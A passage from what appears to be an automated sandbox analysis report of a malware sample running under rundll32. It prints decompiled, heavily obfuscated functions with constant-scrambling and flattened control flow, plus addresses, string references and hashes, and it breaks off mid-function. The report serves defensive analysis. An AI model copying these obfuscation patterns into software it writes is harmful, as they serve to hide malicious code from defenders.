Instruction ID: 7c48ae8ba825526095b0940b5777efada40c450ff2c6e19065f76ced070c7672
Opcode Fuzzy Hash: 2ab281e20babec8f914e23fe26d2a0305b4f6cc775f439d274d1a935f3a080a8
Instruction Fuzzy Hash: 18514671C0121AEBDF19CFE5D94A5EEBBB1FB14308F208199D515B62A0D7B90A46CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00434844, Relevance: 9.0, Strings: 7, Instructions: 259
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E00434844() {
				char _v520;
				char _v1040;
				signed int _v1044;
				signed int _v1048;
				signed int _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				unsigned int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				unsigned int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				signed int _v1152;
				signed int _v1156;
				void* _t297;
				void* _t300;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				signed int _t314;
				signed int _t315;
				void* _t348;
				signed int* _t352;

				_t352 =  &_v1156;
				_v1048 = 0xd4c9;
				_v1048 = _v1048 * 0x4c;
				_t348 = 0x16977827;
				_v1048 = _v1048 ^ 0x003f2fc5;
				_v1152 = 0x1223;
				_v1152 = _v1152 + 0xffffe86f;
				_v1152 = _v1152 << 0xe;
				_v1152 = _v1152 + 0xffffc4b4;
				_v1152 = _v1152 ^ 0xfea449db;
				_v1140 = 0xd009;
				_v1140 = _v1140 << 0xf;
				_v1140 = _v1140 | 0x34d7ffad;
				_t310 = 0x67;
				_v1140 = _v1140 * 0x78;
				_v1140 = _v1140 ^ 0x853faa5e;
				_v1108 = 0xfb19;
				_v1108 = _v1108 / _t310;
				_v1108 = _v1108 | 0xfc9c85cc;
				_v1108 = _v1108 + 0xffff75b2;
				_v1108 = _v1108 ^ 0xfc9bca28;
				_v1096 = 0x8988;
				_v1096 = _v1096 >> 0xf;
				_v1096 = _v1096 >> 2;
				_v1096 = _v1096 ^ 0xb058b54e;
				_v1096 = _v1096 ^ 0xb058a14a;
				_v1092 = 0x4bf5;
				_v1092 = _v1092 ^ 0x3fcc7587;
				_v1092 = _v1092 + 0xffff7c60;
				_v1092 = _v1092 ^ 0x3fcbd886;
				_v1124 = 0x90b1;
				_v1124 = _v1124 | 0x0315067d;
				_v1124 = _v1124 << 0xf;
				_v1124 = _v1124 >> 0xd;
				_v1124 = _v1124 ^ 0x00061076;
				_v1100 = 0x6642;
				_v1100 = _v1100 + 0x2c45;
				_v1100 = _v1100 + 0xffffed6b;
				_v1100 = _v1100 + 0xc076;
				_v1100 = _v1100 ^ 0x000143f3;
				_v1132 = 0xeff1;
				_t311 = 0x75;
				_v1132 = _v1132 / _t311;
				_v1132 = _v1132 >> 4;
				_t312 = 0x1b;
				_v1132 = _v1132 * 0x22;
				_v1132 = _v1132 ^ 0x00007806;
				_v1064 = 0x9d13;
				_v1064 = _v1064 + 0xffff9636;
				_v1064 = _v1064 ^ 0x00006af4;
				_v1116 = 0xe2d7;
				_v1116 = _v1116 / _t312;
				_v1116 = _v1116 >> 0xf;
				_v1116 = _v1116 << 2;
				_v1116 = _v1116 ^ 0x00007ff5;
				_v1080 = 0xca15;
				_v1080 = _v1080 << 8;
				_t313 = 0x44;
				_v1080 = _v1080 / _t313;
				_v1080 = _v1080 ^ 0x0002d41f;
				_v1148 = 0x482;
				_v1148 = _v1148 | 0x6f5ddb7d;
				_v1148 = _v1148 >> 7;
				_v1148 = _v1148 ^ 0x00de8355;
				_v1072 = 0xb874;
				_t314 = 0x5f;
				_v1072 = _v1072 / _t314;
				_v1072 = _v1072 ^ 0x00004463;
				_v1056 = 0xaefc;
				_v1056 = _v1056 | 0xd38cb8c2;
				_v1056 = _v1056 ^ 0xd38ca246;
				_v1144 = 0x8c63;
				_t315 = 0x7c;
				_v1144 = _v1144 / _t315;
				_v1144 = _v1144 >> 9;
				_v1144 = _v1144 << 7;
				_v1144 = _v1144 ^ 0x00001598;
				_v1084 = 0x1bb3;
				_v1084 = _v1084 | 0xfc2ca821;
				_v1084 = _v1084 * 0x7a;
				_v1084 = _v1084 ^ 0x2d512892;
				_v1088 = 0x616c;
				_v1088 = _v1088 + 0xffff5892;
				_v1088 = _v1088 ^ 0x224cc7f0;
				_v1088 = _v1088 ^ 0xddb37e9b;
				_v1136 = 0x8caf;
				_v1136 = _v1136 >> 0xb;
				_v1136 = _v1136 >> 1;
				_v1136 = _v1136 * 0x1f;
				_v1136 = _v1136 ^ 0x00000e7d;
				_v1076 = 0xc9f6;
				_v1076 = _v1076 << 9;
				_v1076 = _v1076 >> 0xc;
				_v1076 = _v1076 ^ 0x0000608f;
				_v1068 = 0x998d;
				_v1068 = _v1068 ^ 0xf04ba484;
				_v1068 = _v1068 ^ 0xf04b529f;
				_v1128 = 0x17ad;
				_v1128 = _v1128 ^ 0xb750fecf;
				_v1128 = _v1128 ^ 0x37dc0b1b;
				_v1128 = _v1128 * 0x74;
				_v1128 = _v1128 ^ 0x3fd6ce0a;
				_v1044 = 0x27ee;
				_v1044 = _v1044 << 0xf;
				_v1044 = _v1044 ^ 0x13f7204f;
				_v1112 = 0xf1d1;
				_v1112 = _v1112 << 0x10;
				_v1112 = _v1112 >> 0xc;
				_v1112 = _v1112 + 0xffff75c7;
				_v1112 = _v1112 ^ 0x000ef6df;
				_v1060 = 0x618f;
				_v1060 = _v1060 + 0xffff6fb8;
				_v1060 = _v1060 ^ 0xffffc83e;
				_v1120 = 0x72ef;
				_v1120 = _v1120 >> 0xe;
				_v1120 = _v1120 + 0xffff6b18;
				_v1120 = _v1120 << 2;
				_v1120 = _v1120 ^ 0xfffdf85c;
				_v1052 = 0xbded;
				_v1052 = _v1052 | 0xda406fe1;
				_v1052 = _v1052 ^ 0xda40c173;
				_v1156 = 0xd36a;
				_v1156 = _v1156 << 0xd;
				_v1156 = _v1156 << 0xa;
				_v1156 = _v1156 << 5;
				_v1156 = _v1156 ^ 0xa000634b;
				_v1104 = 0x4b7d;
				_v1104 = _v1104 + 0xffff7f0e;
				_v1104 = _v1104 << 6;
				_v1104 = _v1104 ^ 0x67f3b216;
				_v1104 = _v1104 ^ 0x98012c8f;
				_t297 = E00441999();
				do {
					while(_t348 != 0x16977827) {
						if(_t348 == 0x1a33a432) {
							return E0044CBE7( &_v520, _v1052, __eflags, _v1156, _v1104,  &_v1040);
						}
						if(_t348 == 0x25c7bc2a) {
							_push(0x431348);
							_push(_v1088);
							_push(_v1084);
							_t300 = E00435DFC(_v1056, _v1144, __eflags);
							E0044BAEC(0x104, __eflags, _v1068, _t300,  *0x451088 + 0x38, _v1128, _v1044,  &_v1040, E0043A156(),  *0x451088 + 0x254);
							_t297 = E00440D6D(_v1112, _v1060, _v1120, _t300);
							_t352 =  &(_t352[0xd]);
							_t348 = 0x1a33a432;
							continue;
						}
						_t358 = _t348 - 0x33badc0c;
						if(_t348 != 0x33badc0c) {
							goto L8;
						}
						_push(0x4312d8);
						_push(_v1092);
						_push(_v1096);
						E0043A4D7(_t358, _v1100, _v1132, _v1064, _v1116, E00435DFC(_v1140, _v1108, _t358),  *0x451088 + 0x254,  &_v520,  *0x451088 + 0x38);
						_t297 = E00440D6D(_v1080, _v1148, _v1072, _t306);
						_t352 =  &(_t352[0xd]);
						_t348 = 0x25c7bc2a;
					}
					_t348 = 0x33badc0c;
					L8:
					__eflags = _t348 - 0x27e22baf;
				} while (__eflags != 0);
				return _t297;
			}

0x00434844
0x0043484a
0x0043485d
0x00434861
0x00434866
0x0043486e
0x00434876
0x0043487e
0x00434883
0x0043488b
0x00434893
0x0043489b
0x004348a0
0x004348af
0x004348b2
0x004348b6
0x004348be
0x004348ce
0x004348d2
0x004348da
0x004348e2
0x004348ea
0x004348f2
0x004348f7
0x004348fc
0x00434904
0x0043490c
0x00434914
0x0043491c
0x00434924
0x0043492c
0x00434934
0x0043493c
0x00434941
0x00434946
0x0043494e
0x00434956
0x0043495e
0x00434966
0x0043496e
0x00434976
0x00434982
0x00434987
0x0043498d
0x00434997
0x0043499a
0x0043499e
0x004349a6
0x004349ae
0x004349b6
0x004349be
0x004349ce
0x004349d2
0x004349d7
0x004349dc
0x004349e4
0x004349ec
0x004349f5
0x004349f8
0x004349fc
0x00434a06
0x00434a0e
0x00434a16
0x00434a1b
0x00434a23
0x00434a31
0x00434a36
0x00434a3c
0x00434a44
0x00434a4c
0x00434a54
0x00434a5c
0x00434a68
0x00434a6b
0x00434a6f
0x00434a74
0x00434a79
0x00434a81
0x00434a89
0x00434a96
0x00434a9a
0x00434aa2
0x00434aaa
0x00434ab2
0x00434aba
0x00434ac2
0x00434aca
0x00434acf
0x00434ad8
0x00434adc
0x00434ae4
0x00434aec
0x00434af1
0x00434af6
0x00434afe
0x00434b06
0x00434b0e
0x00434b16
0x00434b1e
0x00434b26
0x00434b33
0x00434b37
0x00434b3f
0x00434b4a
0x00434b52
0x00434b5d
0x00434b65
0x00434b6a
0x00434b6f
0x00434b77
0x00434b7f
0x00434b87
0x00434b8f
0x00434b97
0x00434b9f
0x00434ba4
0x00434bac
0x00434bb1
0x00434bb9
0x00434bc1
0x00434bc9
0x00434bd1
0x00434bd9
0x00434bde
0x00434be3
0x00434be8
0x00434bf0
0x00434bf8
0x00434c00
0x00434c05
0x00434c0d
0x00434c1d
0x00434c31
0x00434c31
0x00434c3f
0x00000000
0x00434d82
0x00434c47
0x00434cc5
0x00434cca
0x00434cce
0x00434cdd
0x00434d2b
0x00434d40
0x00434d45
0x00434d48
0x00000000
0x00434d48
0x00434c49
0x00434c4b
0x00000000
0x00000000
0x00434c51
0x00434c56
0x00434c5a
0x00434c9e
0x00434cb6
0x00434cbb
0x00434cbe
0x00434cbe
0x00434d4f
0x00434d51
0x00434d51
0x00434d51
0x00000000

Strings

r, xrefs: 00434B97
E,, xrefs: 00434956
la, xrefs: 00434AA2
Kc, xrefs: 00434BE8
}K, xrefs: 00434BF0
cD, xrefs: 00434A3C
', xrefs: 00434B3F

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: E,$Kc$cD$la$}K$'$r
API String ID: 0-4173883944
Opcode ID: 48a6127d23cee41efc864973bb9741b020f8df6ec109fb1390d4cf3bffd4849e
Instruction ID: 2b7d77eefcfe639df12aa5378d9e1ab1d0c17df2ad36c19d339c3c6b1c4fb9e9
Opcode Fuzzy Hash: 48a6127d23cee41efc864973bb9741b020f8df6ec109fb1390d4cf3bffd4849e
Instruction Fuzzy Hash: 90D110714093819FE368CF61C58A54FFBF1BBC4748F108A1DF1AA962A0D7B99909CF46

Uniqueness

Uniqueness Score: -1.00%

Function 00173DB8, Relevance: 9.0, Strings: 7, Instructions: 259COMMON

Download Yara Rule

Strings

', xrefs: 001740B3
}K, xrefs: 00174164
cD, xrefs: 00173FB0
la, xrefs: 00174016
E,, xrefs: 00173ECA
r, xrefs: 0017410B
Kc, xrefs: 0017415C

Memory Dump Source

Source File: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_170000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: E,$Kc$cD$la$}K$'$r
API String ID: 0-4173883944
Opcode ID: 6a175492a499137ea374cfe269ddd9e9c8d4711c6dbcf778b749c7f062f43257
Instruction ID: 2115b3a5d9b294bd94f18d4b77a9bd4624110f8f01b1a3a14ba8c2f721e80c42
Opcode Fuzzy Hash: 6a175492a499137ea374cfe269ddd9e9c8d4711c6dbcf778b749c7f062f43257
Instruction Fuzzy Hash: 84D120715093809FE368CF21C98994FFBF1BBD5748F108A1CF1AA962A0D7B58909CF42

Uniqueness

Uniqueness Score: -1.00%

Function 004493AA, Relevance: 9.0, Strings: 7, Instructions: 242
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E004493AA(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a32) {
				intOrPtr _v60;
				char _v68;
				char _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				char _t248;
				void* _t268;
				signed int _t277;
				signed int _t278;
				signed int _t279;
				signed int _t280;
				void* _t283;
				void* _t306;
				intOrPtr _t307;
				signed int* _t310;

				_push(_a32);
				_t306 = __edx;
				_push(0);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(__edx);
				_push(__ecx);
				_t248 = E00442550(0);
				_v72 = _t248;
				_t307 = _t248;
				_v148 = 0x29e1;
				_t310 =  &(( &_v176)[0xa]);
				_v148 = _v148 >> 9;
				_t283 = 0x2cc51d90;
				_v148 = _v148 * 0x6f;
				_v148 = _v148 | 0x583ef178;
				_v148 = _v148 ^ 0x583efdfc;
				_v164 = 0x7cea;
				_v164 = _v164 | 0x4429ef4c;
				_v164 = _v164 + 0xf89e;
				_v164 = _v164 + 0xffff234a;
				_v164 = _v164 ^ 0x442a1bf6;
				_v92 = 0x551c;
				_v92 = _v92 | 0xd302566e;
				_v92 = _v92 ^ 0xd3022a7a;
				_v144 = 0x6ba7;
				_v144 = _v144 << 4;
				_v144 = _v144 + 0xffffb9a2;
				_v144 = _v144 + 0x5888;
				_v144 = _v144 ^ 0x0006e6af;
				_v112 = 0x922a;
				_v112 = _v112 + 0xffff887d;
				_v112 = _v112 | 0x4fd748bd;
				_v112 = _v112 ^ 0x4fd73150;
				_v96 = 0xfb64;
				_v96 = _v96 ^ 0x5db48c82;
				_v96 = _v96 ^ 0x5db438bb;
				_v80 = 0xb20f;
				_v80 = _v80 >> 2;
				_v80 = _v80 ^ 0x0000552e;
				_v172 = 0x50a7;
				_v172 = _v172 + 0xf2d5;
				_v172 = _v172 + 0x271f;
				_v172 = _v172 << 2;
				_v172 = _v172 ^ 0x0005de3e;
				_v100 = 0xadaf;
				_v100 = _v100 * 0x16;
				_v100 = _v100 ^ 0x000ed173;
				_v116 = 0xf129;
				_v116 = _v116 << 0x10;
				_v116 = _v116 * 0x16;
				_v116 = _v116 ^ 0xb986550c;
				_v104 = 0x5183;
				_v104 = _v104 << 0x10;
				_v104 = _v104 + 0xffff5d8d;
				_v104 = _v104 ^ 0x51824a7c;
				_v88 = 0x760e;
				_v88 = _v88 + 0x327e;
				_v88 = _v88 ^ 0x000099bb;
				_v108 = 0xe303;
				_v108 = _v108 | 0x0bc04f3b;
				_v108 = _v108 ^ 0xb2f83cb4;
				_v108 = _v108 ^ 0xb938c20e;
				_v168 = 0xcb46;
				_v168 = _v168 | 0x1c191218;
				_v168 = _v168 ^ 0xd77ae4dd;
				_v168 = _v168 * 3;
				_v168 = _v168 ^ 0x6229d687;
				_v128 = 0x9759;
				_v128 = _v128 + 0x8621;
				_t277 = 0xf;
				_v128 = _v128 / _t277;
				_v128 = _v128 ^ 0x00007121;
				_v76 = 0xd82;
				_t278 = 0x2a;
				_v76 = _v76 * 0xe;
				_v76 = _v76 ^ 0x0000cd5d;
				_v132 = 0x21c9;
				_v132 = _v132 * 0x5a;
				_v132 = _v132 ^ 0x66c8732e;
				_v132 = _v132 ^ 0x66c3ddac;
				_v176 = 0x796f;
				_v176 = _v176 << 9;
				_v176 = _v176 + 0x7729;
				_v176 = _v176 ^ 0xc241325b;
				_v176 = _v176 ^ 0xc2b2798d;
				_v140 = 0xd764;
				_v140 = _v140 >> 0xa;
				_v140 = _v140 | 0x53b98b23;
				_v140 = _v140 ^ 0x53b9a9a1;
				_v156 = 0xc431;
				_v156 = _v156 * 0x4f;
				_v156 = _v156 / _t278;
				_t279 = 0x11;
				_v156 = _v156 * 0x67;
				_v156 = _v156 ^ 0x00942fb3;
				_v124 = 0x3cc2;
				_v124 = _v124 * 9;
				_v124 = _v124 ^ 0x606055d7;
				_v124 = _v124 ^ 0x60627716;
				_v120 = 0xfe38;
				_v120 = _v120 ^ 0x435657c1;
				_v120 = _v120 + 0x12e6;
				_v120 = _v120 ^ 0x4356a6ba;
				_v152 = 0x32f6;
				_v152 = _v152 | 0x1093d085;
				_v152 = _v152 / _t279;
				_v152 = _v152 << 4;
				_v152 = _v152 ^ 0x0f9a6d0a;
				_v160 = 0x4b19;
				_t280 = 0x77;
				_v160 = _v160 / _t280;
				_v160 = _v160 ^ 0xf7099762;
				_v160 = _v160 | 0x01d0dbaa;
				_v160 = _v160 ^ 0xf7d9b5b4;
				_v84 = 0x47d5;
				_v84 = _v84 << 5;
				_v84 = _v84 ^ 0x0008a7be;
				_v136 = 0xe6c7;
				_v136 = _v136 >> 3;
				_v136 = _v136 | 0xf3ae5db4;
				_v136 = _v136 ^ 0xf3ae7fe8;
				do {
					while(_t283 != 0x1257245d) {
						if(_t283 == 0x1752ae50) {
							_push(_t283);
							_t268 = E0044BB38(_a8, _v92, _v144, _v112, _v96,  &_v72);
							_t310 =  &(_t310[5]);
							__eflags = _t268;
							if(_t268 != 0) {
								_t283 = 0x2f6ec6e3;
								continue;
							}
						} else {
							if(_t283 == 0x2cc51d90) {
								_t283 = 0x1752ae50;
								continue;
							} else {
								_t317 = _t283 - 0x2f6ec6e3;
								if(_t283 != 0x2f6ec6e3) {
									goto L10;
								} else {
									E00435755(_v80,  &_v68, _v172, _v100, 0x44);
									_v68 = 0x44;
									_v60 = E00435DFC(_v116, _v104, _t317);
									_t307 = E00440566(_a32, _t306, _a8, _v168, _v128, 0, _v76, _v72, _v132, _v176, _v164 | _v148, _v140, _v156,  &_v68, _v124, _v88, _v108, 0x4313b0);
									E00440D6D(_v120, _v152, _v160, _v60);
									_t310 =  &(_t310[5]) - 0xc + 0x4c;
									_t283 = 0x1257245d;
									continue;
								}
							}
						}
						goto L11;
					}
					E0044506F(_v84, _v136, _v72);
					_t283 = 0x5a97d8c;
					L10:
					__eflags = _t283 - 0x5a97d8c;
				} while (_t283 != 0x5a97d8c);
				L11:
				return _t307;
			}

0x004493b4
0x004493bd
0x004493bf
0x004493c0
0x004493c7
0x004493ce
0x004493d5
0x004493dc
0x004493e3
0x004493e4
0x004493e5
0x004493e6
0x004493eb
0x004493f2
0x004493f4
0x004493fc
0x004493ff
0x00449404
0x0044940e
0x00449412
0x0044941a
0x00449422
0x0044942a
0x00449432
0x0044943a
0x00449442
0x0044944a
0x00449452
0x0044945a
0x00449462
0x0044946a
0x0044946f
0x00449477
0x0044947f
0x00449487
0x0044948f
0x00449497
0x0044949f
0x004494a7
0x004494af
0x004494b7
0x004494bf
0x004494c7
0x004494cc
0x004494d4
0x004494dc
0x004494e4
0x004494ec
0x004494f1
0x004494f9
0x00449506
0x0044950a
0x00449512
0x0044951a
0x00449524
0x00449528
0x00449530
0x00449538
0x0044953d
0x00449545
0x0044954d
0x00449555
0x0044955d
0x00449565
0x0044956d
0x00449575
0x0044957d
0x00449585
0x0044958d
0x00449595
0x004495a2
0x004495a6
0x004495ae
0x004495b8
0x004495cb
0x004495d0
0x004495d6
0x004495de
0x004495eb
0x004495ee
0x004495f2
0x004495fa
0x00449607
0x0044960b
0x00449613
0x0044961b
0x00449623
0x00449628
0x00449630
0x00449638
0x00449640
0x00449648
0x0044964d
0x00449655
0x0044965d
0x0044966a
0x00449676
0x0044967f
0x00449682
0x00449686
0x0044968e
0x0044969b
0x0044969f
0x004496a7
0x004496af
0x004496b7
0x004496bf
0x004496c7
0x004496cf
0x004496d7
0x004496e7
0x004496eb
0x004496f0
0x004496f8
0x00449704
0x0044970c
0x00449710
0x00449718
0x00449720
0x00449728
0x00449730
0x00449735
0x0044973d
0x00449745
0x0044974a
0x00449752
0x0044975a
0x0044975a
0x00449768
0x00449851
0x0044986e
0x00449873
0x00449876
0x00449878
0x0044987a
0x00000000
0x0044987a
0x0044976e
0x00449774
0x0044984a
0x00000000
0x0044977a
0x0044977a
0x0044977c
0x00000000
0x00449782
0x00449797
0x004497a5
0x004497c4
0x00449827
0x00449838
0x0044983d
0x00449840
0x00000000
0x00449840
0x0044977c
0x00449774
0x00000000
0x00449768
0x0044988d
0x00449893
0x00449898
0x00449898
0x00449898
0x004498a5
0x004498b0

Strings

)w, xrefs: 00449628
D, xrefs: 004497A5
!q, xrefs: 004495D6
~2, xrefs: 00449555
L)D, xrefs: 0044942A
), xrefs: 004493F4
.U, xrefs: 004494CC

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: !q$)w$.U$D$L)D$~2$)
API String ID: 0-595699237
Opcode ID: 3ffc013c7f143055af2b635f403617403d4ccd1276d0efb7cf7887faefe2ccd9
Instruction ID: 76bb4f73646062872836cf31a9e7eaeeea45cb6bdb6539cdbb94af14facd6d17
Opcode Fuzzy Hash: 3ffc013c7f143055af2b635f403617403d4ccd1276d0efb7cf7887faefe2ccd9
Instruction Fuzzy Hash: E3C101715083809FE368CF65C48AA1BFBF1BBC5758F10891DF19A962A0D3B58A49CF47

Uniqueness

Uniqueness Score: -1.00%

Function 0018891E, Relevance: 9.0, Strings: 7, Instructions: 242COMMON

Download Yara Rule

Strings

!q, xrefs: 00188B4A
D, xrefs: 00188D19
)w, xrefs: 00188B9C
.U, xrefs: 00188A40
), xrefs: 00188968
~2, xrefs: 00188AC9
L)D, xrefs: 0018899E

Memory Dump Source

Source File: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_170000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: !q$)w$.U$D$L)D$~2$)
API String ID: 0-595699237
Opcode ID: 7256cd9149fbbca799cb3615b561e9a7d920d3c9d6f0bc85317b2e9bdd81c148
Instruction ID: 96eb0fe8285c9289ab9226bf56777bc80ed98cfd21b0393ef819cb33cb6463ec
Opcode Fuzzy Hash: 7256cd9149fbbca799cb3615b561e9a7d920d3c9d6f0bc85317b2e9bdd81c148
Instruction Fuzzy Hash: 83C101711083809FE368DF65C58A61BFBF2BBC4348F508A1DF196962A0D7B58A49CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00435F04, Relevance: 9.0, Strings: 7, Instructions: 237
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E00435F04() {
				char _v524;
				intOrPtr _v548;
				char _v564;
				void* _v576;
				intOrPtr _v580;
				signed int _v584;
				char _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _t227;
				void* _t230;
				signed int _t231;
				void* _t233;
				signed int _t238;
				void* _t239;
				signed int _t241;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t246;
				signed int _t261;
				void* _t265;
				void* _t267;
				signed int* _t272;

				_t272 =  &_v676;
				_v580 = 0x338be2;
				asm("stosd");
				_t239 = 0;
				_t241 = 0x39;
				asm("stosd");
				_t265 = 0x41161d4;
				asm("stosd");
				_v620 = 0xc71e;
				_v620 = _v620 * 0x1e;
				_v620 = _v620 >> 5;
				_v620 = _v620 ^ 0x0000ba2c;
				_v648 = 0x4ad;
				_v648 = _v648 / _t241;
				_v648 = _v648 >> 0xe;
				_v648 = _v648 >> 0xe;
				_v648 = _v648 ^ 0x00000001;
				_v660 = 0xb98c;
				_v660 = _v660 | 0xef7bff5f;
				_v660 = _v660 ^ 0xef7ba8e4;
				_v632 = 0x5e63;
				_v632 = _v632 | 0xe7359418;
				_v632 = _v632 + 0x2517;
				_v632 = _v632 ^ 0xe7367cd6;
				_v596 = 0x2929;
				_v596 = _v596 + 0x43ca;
				_v596 = _v596 ^ 0x000063d5;
				_v664 = 0x7cfb;
				_v664 = _v664 ^ 0xff809b0f;
				_v664 = _v664 + 0x2cd1;
				_v664 = _v664 + 0x7a24;
				_v664 = _v664 ^ 0xff81c2ff;
				_v592 = 0xae03;
				_t242 = 9;
				_v592 = _v592 / _t242;
				_v592 = _v592 ^ 0x0000766d;
				_v608 = 0x3b9d;
				_v608 = _v608 | 0x6b9c2f64;
				_v608 = _v608 ^ 0x6b9c4a2d;
				_v656 = 0xaf4c;
				_v656 = _v656 << 2;
				_v656 = _v656 + 0xc291;
				_v656 = _v656 + 0x928e;
				_v656 = _v656 ^ 0x0004749a;
				_v604 = 0xbdeb;
				_v604 = _v604 | 0xec45ef56;
				_v604 = _v604 ^ 0xec45acc1;
				_v644 = 0x8038;
				_v644 = _v644 ^ 0x1255fbe8;
				_t243 = 0x4b;
				_v644 = _v644 / _t243;
				_v644 = _v644 * 0x17;
				_v644 = _v644 ^ 0x059f4be8;
				_v652 = 0x8226;
				_v652 = _v652 << 1;
				_v652 = _v652 + 0xffffb0cc;
				_v652 = _v652 + 0xffff366a;
				_v652 = _v652 ^ 0xffff9d86;
				_v640 = 0x94c8;
				_v640 = _v640 >> 3;
				_v640 = _v640 | 0xd3d89bc1;
				_v640 = _v640 ^ 0xd3d8bf09;
				_v600 = 0x2497;
				_v600 = _v600 >> 5;
				_v600 = _v600 ^ 0x00002681;
				_v616 = 0xf8c0;
				_v616 = _v616 + 0xffffe75c;
				_v616 = _v616 >> 5;
				_v616 = _v616 ^ 0x00007175;
				_v624 = 0x8160;
				_t244 = 0x37;
				_v624 = _v624 / _t244;
				_v624 = _v624 + 0xffff3ee5;
				_v624 = _v624 ^ 0xffff1b58;
				_v636 = 0xef93;
				_v636 = _v636 | 0x0110f965;
				_t245 = 0x18;
				_v636 = _v636 * 0x45;
				_v636 = _v636 ^ 0x4994db44;
				_v612 = 0xb7f9;
				_v612 = _v612 | 0xd5831ca8;
				_v612 = _v612 ^ 0xd583ba2a;
				_v668 = 0xb9bd;
				_v668 = _v668 >> 0xb;
				_v668 = _v668 + 0xf462;
				_v668 = _v668 + 0xb834;
				_v668 = _v668 ^ 0x0001a073;
				_v676 = 0xaaae;
				_t264 = _v612;
				_v676 = _v676 / _t245;
				_t227 = _v676;
				_t246 = 0x6e;
				_t261 = _t227 % _t246;
				_v676 = _t227 / _t246;
				_v676 = _v676 + 0xffff2536;
				_v676 = _v676 ^ 0xffff3866;
				_v628 = 0x8f9e;
				_v628 = _v628 * 3;
				_v628 = _v628 >> 5;
				_v628 = _v628 ^ 0x00000ef3;
				_v672 = 0x182c;
				_v672 = _v672 + 0xffff84fe;
				_v672 = _v672 + 0xd7a3;
				_v672 = _v672 | 0x6c762e0a;
				_v672 = _v672 ^ 0x6c767ecc;
				do {
					while(_t265 != 0x5e31a3) {
						if(_t265 == 0x41161d4) {
							_t265 = 0xacc4a3c;
							continue;
						} else {
							if(_t265 == 0x7641b8a) {
								_t231 = E00447A31(_v644,  &_v564, _t246, _v652, _t264, _v640, _t246, _v600);
								asm("sbb esi, esi");
								_t261 = _v624;
								_t246 = _v616;
								_t265 = ( ~_t231 & 0x1bdf7361) + 0x8e8e3cb;
								E0043F1ED(_t246, _t261, _v636, _v612, _t264);
								_t272 =  &(_t272[9]);
								goto L19;
							} else {
								if(_t265 == 0xacc4a3c) {
									_push(_t246);
									_t261 =  &_v524;
									_t246 = _v660;
									_t233 = E0043DFD8(_t246, _t261, __eflags, _v632, _v596);
									_t272 =  &(_t272[3]);
									__eflags = _t233;
									if(__eflags != 0) {
										_t265 = 0x2aa4bbbd;
										continue;
									}
								} else {
									if(_t265 == 0x24c8572c) {
										_t261 = _v676;
										E00444291(_v668, _t261,  &_v588, _v628);
										_pop(_t246);
										_t265 = 0x5e31a3;
										continue;
									} else {
										if(_t265 != 0x2aa4bbbd) {
											goto L19;
										} else {
											_push(_t246);
											_t261 = _v620;
											_t246 = _v648;
											_t238 = E0044C0C8(_t246, _t261, _v664,  &_v524, _v592, _v608, 0, _v656, _t246, _v672, _v604);
											_t264 = _t238;
											_t272 =  &(_t272[0xa]);
											if(_t238 != 0xffffffff) {
												_t265 = 0x7641b8a;
												continue;
											}
										}
									}
								}
							}
						}
						goto L20;
					}
					_t230 = E004347EB();
					_t267 = _v588 - _v548;
					_t246 = _v584;
					asm("sbb ecx, [esp+0x94]");
					__eflags = _t246 - _t261;
					if(__eflags >= 0) {
						if(__eflags > 0) {
							L17:
							_t239 = 1;
							__eflags = 1;
						} else {
							__eflags = _t267 - _t230;
